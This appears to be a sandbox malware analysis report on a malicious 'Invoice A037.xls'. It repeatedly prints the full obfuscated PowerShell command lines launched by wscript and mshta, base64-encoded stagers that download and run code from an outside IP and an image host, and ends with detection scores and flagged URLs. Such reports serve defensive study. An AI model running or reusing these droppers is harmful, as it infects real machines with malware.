Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	121 Command and Scripting Interpreter	121 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	23 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Install Root Certificate	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Invoice A037.xls	19%	Virustotal		Browse
Invoice A037.xls	21%	ReversingLabs	Win32.Exploit.Generic
Invoice A037.xls	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
paste.rs	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa	100%	Avira URL Cloud	malware
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki	0%	Avira URL Cloud	safe
